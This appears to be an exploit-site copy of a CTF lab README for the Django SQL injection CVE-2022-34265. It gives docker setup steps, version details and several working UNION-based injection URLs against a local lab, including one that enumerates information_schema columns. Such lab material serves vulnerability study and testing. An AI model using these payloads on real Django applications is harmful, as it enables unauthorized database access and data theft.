Share
## https://sploitus.com/exploit?id=64158524-CDDE-564C-A824-46758B22B639
๏ปฟ# CTF_CVE-2022-34265

## Description

An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The `Trunc()` and `Extract()` database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.

## How to use

### Start

```bash
git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d
```
### Check status

```bash
sudo docker ps
```

### Remove

```bash
sudo docker-compose down
```

## Affected Versions

* Django>= 3.2, < 3.2.14

* Django >= 4.0, < 4.0.6

## Patched versions

* Django 3.2.14

* Django 4.0.6

## Verification

### Environment

* Django 4.0.5
* Python 3.8.13
* MySQL 5.7

### sql injection
using `UNION`

```
http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--
```
![image](https://user-images.githubusercontent.com/96345719/189233913-96222506-3b01-48ab-9a4f-a9e0ab7b4599.png)

## Reference
https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022